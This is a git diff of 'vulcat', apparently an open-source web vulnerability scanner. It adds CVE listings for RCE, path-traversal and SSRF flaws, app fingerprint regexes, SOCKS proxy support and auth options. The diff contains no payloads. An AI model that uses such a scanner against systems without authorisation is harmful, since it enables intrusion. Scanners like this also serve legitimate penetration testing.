目前支持扫描的web漏洞有: [点击展开]
@@ -27,6 +28,10 @@ +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 路径遍历 | +| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 路径遍历 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 | @@ -78,14 +83,30 @@ +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Influxdb | None | unAuth | influxdb 未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Jetty | CVE-2021-28164 | DSinfo | jetty 模糊路径信息泄露 | +| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet 双重解码信息泄露 | +| Jetty | CVE-2021-34429 | DSinfo | jetty 模糊路径信息泄露 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Jupyter | None | unAuth | Jupyter 未授权访问 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd 任意文件读取 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ +| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum插件 远程命令执行 | +| Nexus Repository | CVE-2019-7238 | RCE | 3.x 远程命令执行 | +| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475的绕过 | +| Nexus Repository | CVE-2020-10199 | RCE | 3.x 远程命令执行 | +| Nexus Repository | CVE-2020-10204 | RCE | 3.x 远程命令执行 | ++----------------------+--------------------+--------------+--------------------------------------------------------------------+ | Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 | | Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 | +----------------------+--------------------+--------------+--------------------------------------------------------------------+ @@ -180,14 +201,29 @@ Options: 线程数 (默认: 2) --delay=DELAY 延迟时间/秒 (默认: 1) --timeout=TIMEOUT 超时时间/秒 (默认: 10) - --http-proxy=HTTP_PROXY - http/https代理 (如: --http-proxy 127.0.0.1:8080) --user-agent=UA 自定义User-Agent - --cookie=COOKIE 添加cookie + --cookie=COOKIE 添加cookie (如: --cookie "PHPSESSID=123456789") + --auth=AUTHORIZATION + 添加Authorization (如: --auth "Basic YWRtaW46YWRtaW4=") + + 日志: + 运行时输出的debug信息 + --log=LOG 日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容] + Proxy: + 代理 + + --http-proxy=HTTP_PROXY + http/https代理 (如: --http-proxy 127.0.0.1:8080) + --socks4-proxy=SOCKS4_PROXY + socks4代理(如: --socks4-proxy 127.0.0.1:8080) + --socks5-proxy=SOCKS5_PROXY + socks5代理(如: --socks5-proxy 127.0.0.1:8080 或 + admin:123456@127.0.0.1:8080) + Application: 指定扫描的目标类型 @@ -229,10 +265,10 @@ Options: --list 查看所有Payload 支持的目标类型(-a参数, 不区分大小写): - AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue - nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins, - keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w - eblogic,webmin,yonyou + AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb, + confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,g + itea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,noder + ed,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou ``` ## language diff --git a/README_en-us.md b/README_en-us.md index b67389b..436a586 100644 --- a/README_en-us.md +++ b/README_en-us.md @@ -1,11 +1,11 @@ # vulcat - +(Monthly update)* Vulcat can be used to scan for vulnerabilities on the Web side. When a vulnerability is discovered, the target URL and Payload are prompted. Users can manually verify the vulnerability according to the prompt
* Users can also write their own POC and add it to vulcat for scanning, You are also welcome to contribute your POC to the project * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Landray-OA, RubyOnRails, Jenkins, Keycloak, mongo-express, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou
The current web vulnerabilities that support scanning: [Click on]
@@ -26,6 +26,10 @@ +----------------------+--------------------+--------------+------------------------------------------------------------+ | Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 Directory traversal | +| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 Directory traversal | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead | +----------------------+--------------------+--------------+------------------------------------------------------------+ | Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution | @@ -77,14 +81,30 @@ +----------------------+--------------------+--------------+------------------------------------------------------------+ | Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Influxdb | None | unAuth | influxdb unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Jetty | CVE-2021-28164 | DSinfo | jetty Disclosure information | +| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet Disclosure information| +| Jetty | CVE-2021-34429 | DSinfo | jetty Disclosure information | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Jupyter | None | unAuth | Jupyter unAuthorized | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF | +----------------------+--------------------+--------------+------------------------------------------------------------+ | Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd FileRead | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | mongo-express | CVE-2019-10758 | RCE | Remote code execution | +----------------------+--------------------+--------------+------------------------------------------------------------+ +| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum Remote code execution | +| Nexus Repository | CVE-2019-7238 | RCE | 3.x Remote code execution | +| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475 Bypass | +| Nexus Repository | CVE-2020-10199 | RCE | 3.x Remote code execution | +| Nexus Repository | CVE-2020-10204 | RCE | 3.x Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ | Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal | | Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution | +----------------------+--------------------+--------------+------------------------------------------------------------+ @@ -179,11 +199,15 @@ Options: The number of threads (default: 2) --delay=DELAY Delay time/s (default: 1) --timeout=TIMEOUT Timeout/s (default: 10) - --http-proxy=HTTP_PROXY - The HTTP/HTTPS proxy (e.g. --http-proxy - 127.0.0.1:8080) --user-agent=UA Customize the User-Agent - --cookie=COOKIE Add a cookie + --cookie=COOKIE Add a cookie (e.g. --cookie "PHPSESSID=123456789") + --auth=AUTHORIZATION + Add a Authorization (e.g. --auth "Basic + YWRtaW46YWRtaW4=") + + Log: + Debug information + --log=LOG The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request @@ -191,6 +215,18 @@ Options: packet] [Level 5: Level 4 content + response header] [level 6: Level 5 content + response content] + Proxy: + Proxy server + + --http-proxy=HTTP_PROXY + The HTTP/HTTPS proxy (e.g. --http-proxy + 127.0.0.1:8080) + --socks4-proxy=SOCKS4_PROXY + The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080) + --socks5-proxy=SOCKS5_PROXY + The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or + admin:123456@127.0.0.1:8080) + Application: Specify the target type for the scan @@ -241,10 +277,10 @@ Options: --list View all payload Supported target types(Case insensitive): - AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue - nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins, - keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w - eblogic,webmin,yonyou + AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb, + confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,g + itea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,noder + ed,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou ``` ## language diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 7aec2f7..e675cd5 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -16,6 +16,8 @@ from payloads.ApacheAirflow import airflow from payloads.ApacheAPISIX import apisix from payloads.ApacheFlink import flink +from payloads.ApacheHadoop import hadoop +from payloads.ApacheHttpd import httpd from payloads.ApacheSolr import solr from payloads.ApacheTomcat import tomcat from payloads.ApacheStruts2 import struts2 @@ -31,12 +33,16 @@ from payloads.Gitea import gitea from payloads.Gitlab import gitlab from payloads.Grafana import grafana -from payloads.ApacheHadoop import hadoop +from payloads.Influxdb import influxdb from payloads.Jenkins import jenkins +from payloads.Jetty import jetty +from payloads.Jupyter import jupyter from payloads.Keycloak import keycloak # from payloads.Kindeditor import kindeditor from payloads.Landray import landray +from payloads.MiniHttpd import minihttpd from payloads.MongoExpress import mongoexpress +from payloads.Nexus import nexus from payloads.Nodejs import nodejs from payloads.NodeRED import nodered from payloads.RubyOnRails import rails @@ -79,49 +85,53 @@ def start(self): if (('http://' not in u[0:10]) and ('https://' not in u[0:10])): logger.info('red_ex', self.lang['core']['start']['url_error'].format(u)) continue - - logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url - # * --------------------WAF指纹识别-------------------- - if (not self.no_waf): - waf_info = waf.identify(u) # * WAF指纹识别 - if waf_info: - while True: - if (not self.batch): # * 是否使用默认选项 - logger.info('red', '', print_end='') - operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数 - else: - logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='') - operation = 'no' # * 默认选项No - logger.info('red', 'no', notime=True) - - operation = operation.lower() # * 字母转小写 - if operation in ['y', 'yes']: # * 继续扫描 - logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描 - break - elif operation in ['n', 'no']: - logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个 - u = 'next' - break - else: - logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find']) + logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url - if u == 'next': + if check.check_connect(u): + # * --------------------WAF指纹识别-------------------- + if (not self.no_waf): + waf_info = waf.identify(u) # * WAF指纹识别 + if waf_info: + while True: + if (not self.batch): # * 是否使用默认选项 + logger.info('red', '', print_end='') + operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数 + else: + logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='') + operation = 'no' # * 默认选项No + logger.info('red', 'no', notime=True) + + operation = operation.lower() # * 字母转小写 + if operation in ['y', 'yes']: # * 继续扫描 + logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描 + break + elif operation in ['n', 'no']: + logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个 + u = 'next' + break + else: + logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find']) + + if u == 'next': + continue + # * --------------------WAF指纹识别-------------------- + + # * --------------------框架指纹识别-------------------- + if ((self.application == 'auto') and (not self.vuln)): + logger.info('yellow_ex', self.lang['core']['web_finger']['web']) + webapp.stop = self.stop + new_app_list = webapp.identify(u) + if new_app_list: + logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list))) + self.app_list = new_app_list + else: + logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find']) + + # * --------------------框架指纹识别-------------------- + else: + logger.info('red', self.lang['core']['start']['unable'] + u) # ? 提示, 无法访问当前url continue - # * --------------------WAF指纹识别-------------------- - - # * --------------------框架指纹识别-------------------- - if ((self.application == 'auto') and (not self.vuln)): - logger.info('yellow_ex', self.lang['core']['web_finger']['web']) - webapp.stop = self.stop - new_app_list = webapp.identify(u) - if new_app_list: - logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list))) - self.app_list = new_app_list - else: - logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find']) - - # * --------------------框架指纹识别-------------------- if self.no_poc: logger.info('red', self.lang['core']['start']['no_poc']) diff --git a/lib/initial/config.py b/lib/initial/config.py index aec9184..e0d9023 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py @@ -9,6 +9,8 @@ from thirdparty.requests import packages import re import http.client +import socket +import socks global config @@ -69,13 +71,36 @@ def __init__(self, args): 'Accept': '*/*', 'Connection': 'close' } + if args.cookie: args.headers['Cookie'] = args.cookie.lstrip('Cookie: ') - args.proxies = { - 'http': args.http_proxy, - 'https': args.http_proxy - } + if args.authorization: + args.headers['Authorization'] = args.authorization.lstrip('Authorization: ') + + if args.http_proxy: # * requests代理 + args.proxies = { + 'http': 'http://' + args.http_proxy, + 'https': 'http://' + args.http_proxy + } + args.proxy = tuple(args.http_proxy.split(':')) # * HackRequests代理 + else: + args.proxies = {} + args.proxy = () + + if args.socks5_proxy: # * socks 5 + if ('@' in args.socks5_proxy): # * 有无身份验证 + proxy_5 = args.socks5_proxy.replace('@', ':').split(':') + socks.set_default_proxy(socks.SOCKS5, proxy_5[2], int(proxy_5[3]), username=proxy_5[0], password=proxy_5[1]) + else: + proxy_5 = args.socks5_proxy.split(':') + socks.set_default_proxy(socks.SOCKS5, proxy_5[0], int(proxy_5[1])) + socket.socket = socks.socksocket + + elif args.socks4_proxy: # * socks 4 + proxy_4 = args.socks4_proxy.split(':') + socks.set_default_proxy(socks.SOCKS4, proxy_4[0], int(proxy_4[1])) + socket.socket = socks.socksocket if args.vuln: args.vuln = args.vuln.lower() @@ -87,15 +112,14 @@ def __init__(self, args): 'discuz', 'django', 'drupal', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', - # 'gitea', 'gitlab', 'grafana', - 'gitea', 'gitlab', - 'hadoop', - 'jenkins', - # 'keycloak', 'kindeditor', - 'keycloak', + 'gitea', 'gitlab', # 'grafana', + 'influxdb', + 'hadoop', 'httpd', + 'jenkins', 'jetty', 'jupyter', + 'keycloak', # 'kindeditor', 'landray', - 'mongoexpress', - 'nacos', 'nodejs', 'nodered', + 'minihttpd', 'mongoexpress', + 'nexus', 'nacos', 'nodejs', 'nodered', 'rails', 'showdoc', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', diff --git a/lib/initial/language.py b/lib/initial/language.py index d21eefb..fd389b9 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py @@ -26,11 +26,23 @@ def language(): 'thread': 'The number of threads (default: 2)', 'delay': 'Delay time/s (default: 1)', 'timeout': 'Timeout/s (default: 10)', - 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)', 'user_agent': 'Customize the User-Agent', - 'cookie': 'Add a cookie', + 'cookie': 'Add a cookie (e.g. --cookie "PHPSESSID=123456789")', + 'Authorization': 'Add a Authorization (e.g. --auth "Basic YWRtaW46YWRtaW4=")', + }, + 'log_help': { + 'title': 'Log', + 'name': 'Debug information', 'log': 'The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request target +POST data] [level 4: Level 2 content + request packet] [Level 5: Level 4 content + response header] [level 6: Level 5 content + response content]' }, + 'proxy_help': { + 'title': 'Proxy', + 'name': 'Proxy server', + 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)', + 'socks4_proxy': 'The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080)', + 'socks5_proxy': 'The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or admin:123456@127.0.0.1:8080)', + + }, 'application_help': { 'title': 'Application', 'name': 'Specify the target type for the scan', @@ -141,11 +153,22 @@ def language(): 'thread': '线程数 (默认: 2)', 'delay': '延迟时间/秒 (默认: 1)', 'timeout': '超时时间/秒 (默认: 10)', - 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)', 'user_agent': '自定义User-Agent', - 'cookie': '添加cookie', + 'cookie': '添加cookie (如: --cookie "PHPSESSID=123456789")', + 'Authorization': '添加Authorization (如: --auth "Basic YWRtaW46YWRtaW4=")' + }, + 'log_help': { + 'title': '日志', + 'name': '运行时输出的debug信息', 'log': '日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容]' }, + 'proxy_help': { + 'title': 'Proxy', + 'name': '代理', + 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)', + 'socks4_proxy': 'socks4代理(如: --socks4-proxy 127.0.0.1:8080)', + 'socks5_proxy': 'socks5代理(如: --socks5-proxy 127.0.0.1:8080 或 admin:123456@127.0.0.1:8080)', + }, 'application_help': { 'title': 'Application', 'name': '指定扫描的目标类型', diff --git a/lib/initial/list.py b/lib/initial/list.py index 9311be5..db6ccbc 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py @@ -74,6 +74,23 @@ def list(): 'description': 'Hadoop YARN ResourceManager 未授权访问' } ], + 'Apache Httpd': [ + { + 'vul_id': 'CVE-2021-40438', + 'type': 'SSRF', + 'description': 'Apache HTTP Server 2.4.48 mod_proxy SSRF ' + }, + { + 'vul_id': 'CVE-2021-41773', + 'type': 'FileRead/RCE', + 'description': 'Apache HTTP Server 2.4.49 路径遍历' + }, + { + 'vul_id': 'CVE-2021-42013', + 'type': 'FileRead/RCE', + 'description': 'Apache HTTP Server 2.4.50 路径遍历' + } + ], 'Apache Solr': [ { 'vul_id': 'CVE-2021-27905', @@ -284,6 +301,13 @@ def list(): 'description': 'Grafana 8.x 插件模块路径遍历' }, ], + 'Influxdb': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'influxdb 未授权访问' + }, + ], 'Jenkins': [ { 'vul_id': 'CVE-2018-1000861', @@ -291,6 +315,30 @@ def list(): 'description': 'jenkins 远程命令执行' } ], + 'Jetty': [ + { + 'vul_id': 'CVE-2021-28164', + 'type': 'DSinfo', + 'description': 'jetty 模糊路径信息泄露' + }, + { + 'vul_id': 'CVE-2021-28169', + 'type': 'DSinfo', + 'description': 'jetty Utility Servlets ConcatServlet 双重解码信息泄露' + }, + { + 'vul_id': 'CVE-2021-34429', + 'type': 'DSinfo', + 'description': 'jetty 模糊路径信息泄露' + } + ], + 'Jupyter': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'Jupyter 未授权访问' + } + ], 'Keycloak': [ { 'vul_id': 'CVE-2020-10770', @@ -313,6 +361,13 @@ def list(): 'description': '蓝凌OA 任意文件读取/SSRF' } ], + 'Mini Httpd': [ + { + 'vul_id': 'CVE-2018-18778', + 'type': 'FileRead', + 'description': 'mini_httpd 任意文件读取' + } + ], 'mongo-express': [ { 'vul_id': 'CVE-2019-10758', @@ -320,6 +375,33 @@ def list(): 'description': '未授权远程代码执行' } ], + 'Nexus Repository': [ + { + 'vul_id': 'CVE-2019-5475', + 'type': 'RCE', + 'description': '2.x yum插件 远程命令执行' + }, + { + 'vul_id': 'CVE-2019-7238', + 'type': 'RCE', + 'description': '3.x 远程命令执行' + }, + { + 'vul_id': 'CVE-2019-15588', + 'type': 'RCE', + 'description': '2019-5475的绕过' + }, + { + 'vul_id': 'CVE-2020-10199', + 'type': 'RCE', + 'description': '3.x 远程命令执行' + }, + { + 'vul_id': 'CVE-2020-10204', + 'type': 'RCE', + 'description': '3.x 远程命令执行' + } + ], 'Nodejs': [ { 'vul_id': 'CVE-2017-14849', diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 6e4a82f..7321c83 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py @@ -19,7 +19,7 @@ def parse(): python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.1.2\n') +''', version='vulcat.py-1.1.3\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) @@ -31,16 +31,25 @@ def parse(): optional.add_option('-t', '--thread', type='int', dest='thread', default=2, help=lang['optional_help']['thread']) optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay']) optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout']) - optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy']) optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent']) optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie']) - optional.add_option('--log', type='int', dest='log', default=1, help=lang['optional_help']['log']) + optional.add_option('--auth', type='string', dest='authorization', default=None, help=lang['optional_help']['Authorization']) + # optional.add_option('--random-ua', dest='random_ua', action='store_true', help='') + + # * 日志参数 + log = parser.add_option_group(lang['log_help']['title'], lang['log_help']['name']) + log.add_option('--log', type='int', dest='log', default=1, help=lang['log_help']['log']) + + # * 代理 + proxy = parser.add_option_group(lang['proxy_help']['title'], lang['proxy_help']['name']) + proxy.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['proxy_help']['http_proxy']) + proxy.add_option('--socks4-proxy', type='string', dest='socks4_proxy', default=None, help=lang['proxy_help']['socks4_proxy']) + proxy.add_option('--socks5-proxy', type='string', dest='socks5_proxy', default=None, help=lang['proxy_help']['socks5_proxy']) # * 指定目标类型 application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name']) application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application']) application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln']) - # application.add_option('-c', '--command', type='string', dest='command', default=None, help='配合exp执行自定义命令') # * 第三方api, 例如dnslog/ceye api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name']) @@ -50,6 +59,7 @@ def parse(): save = parser.add_option_group(lang['save_help']['title'], lang['save_help']['name']) save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text']) save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json']) + # save.add_option('--output-html', type='string', dest='html_filename', default=None, help='') # * 通用参数 general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name']) diff --git a/lib/plugins/Exp.py b/lib/plugins/Exp.py deleted file mode 100644 index 67d4600..0000000 --- a/lib/plugins/Exp.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - 插件: - POC转EXP -''' - -from lib.api.dns import dns -from lib.initial.config import config -from lib.tool.md5 import md5, random_md5 -from lib.tool.logger import logger -from lib.tool.thread import thread -from lib.tool import check -from lib.tool import head -from thirdparty import requests -from time import sleep -import re - -def exp(result): - pass \ No newline at end of file diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py index 346e528..5ccf14c 100644 --- a/lib/plugins/fingerprint/webapp.py +++ b/lib/plugins/fingerprint/webapp.py @@ -159,6 +159,24 @@ def __init__(self): r'Apache Flink Web Dashboard' ] }, + { + 'name': 'httpd', + 'path': '', + 'data': '', + 'fingerprint': [ + r'The requested URL was not found on this server\.', + r'You don\'t have permission to access this resource\.', + r'The server is temporarily unable to service your request due to maintenance downtime or capacity problems\. Please try again later\.', + r'Copyright.*\d{0,4}-\d{0,4} Apache Software Foundation\. All Rights Reserved
', + r'These icons were originally made for Mosaic for X.*If you\'d like to contribute additions to this set.*http://httpd\.apache\.org/docs-project', + r'Copyright.*\d{0,4}-\d{0,4} Apache Software Foundation\. All Rights Reserved
' ] }, { @@ -364,6 +384,24 @@ def __init__(self): r'Welcome to Jenkins!
' ] }, + { + 'name': 'jetty', + 'path': '', + 'data': '', + 'fingerprint': [ + r'Powered by Jetty:// .{0,30}
' + ] + }, + { + 'name': 'jupyter', + 'path': '', + 'data': '', + 'fingerprint': [ + r'Jupyter Notebook requires JavaScript', + r"
",
+ r'Currently running Jupyter processes'
+ ]
+ },
# {
# 'name': 'keycloak',
# 'path': '',
@@ -389,6 +427,14 @@ def __init__(self):
r"'lui': 'sys/ui/js'"
]
},
+ {
+ 'name': 'minihttpd',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'mini_httpd/.{0,40}'
+ ]
+ },
{
'name': 'mongoexpress',
'path': '',
@@ -400,6 +446,21 @@ def __init__(self):
r'Mongo Express
' ] }, + { + 'name': 'nexus', + 'path': '', + 'data': '', + 'fingerprint': [ + r'
',
+ r'You are using a version of Internet Explorer that is not supported\.See the ' + ] + }, { 'name': 'nodejs', 'path': '/404', diff --git a/lib/report/output.py b/lib/report/output.py index 561d7e3..d5016b0 100644 --- a/lib/report/output.py +++ b/lib/report/output.py @@ -6,6 +6,7 @@ from lib.tool.timed import nowtime_year from lib.tool.logger import logger from thirdparty import requests +from thirdparty import HackRequests # from lib.plugins.Exp import exp import json import http.client @@ -83,6 +84,8 @@ def output_json(results, filename, lang): for key in result_info.keys(): if type(result_info[key]) == requests.models.Response: result_info[key] = output_res(key, result_info[key], iscolor=False) + elif type(result_info[key]) == HackRequests.response: + result_info[key] = output_Hackres(key, result_info[key], iscolor=False) results_info_list.append(json.dumps(result_info, indent=4) + '\n') results_info_list = set(results_info_list) @@ -127,6 +130,9 @@ def output_vul_info_color(result): elif value_type == requests.models.Response: # * Response输出方式 result_info += output_res(key, value) + elif value_type == HackRequests.response: + result_info += output_Hackres(key, value) # * HackResponse输出方式 + return result_info def output_vul_info(result): @@ -146,6 +152,9 @@ def output_vul_info(result): elif value_type == requests.models.Response: result_info += output_res(key, value, iscolor=False) + elif value_type == HackRequests.response: + result_info += output_Hackres(key, value, iscolor=False) + return result_info def output_str(key, value, iscolor=True): @@ -247,4 +256,30 @@ def output_res(key, res, iscolor=True): except: return info_res + return info_res + +def output_Hackres(key, res, iscolor=True): + ''' 接收一个HackRequests结果, 返回一个http数据包 ''' + info_res = '' + + if iscolor: + try: + info_res += color.yellow_ex(key) + ':' + info_res += color.red_ex(' [Request') + info_res += color.black_ex('\n' + res.log.get('request')) + + info_res += color.red_ex(']') + info_res += color.reset('\n ') + except: + return info_res + else: + try: + info_res += key + ':' + info_res += ' [Request' + info_res += '\n' + res.log.get('request').replace('\n', '') + + info_res += ']\n ' + except: + return info_res + return info_res \ No newline at end of file diff --git a/lib/tool/check.py b/lib/tool/check.py index ea658d2..a914319 100644 --- a/lib/tool/check.py +++ b/lib/tool/check.py @@ -34,8 +34,8 @@ def check_connect(url): except requests.ConnectionError: return False except Exception as e: - return False # print(e) + return False def check_res(res, md): ''' 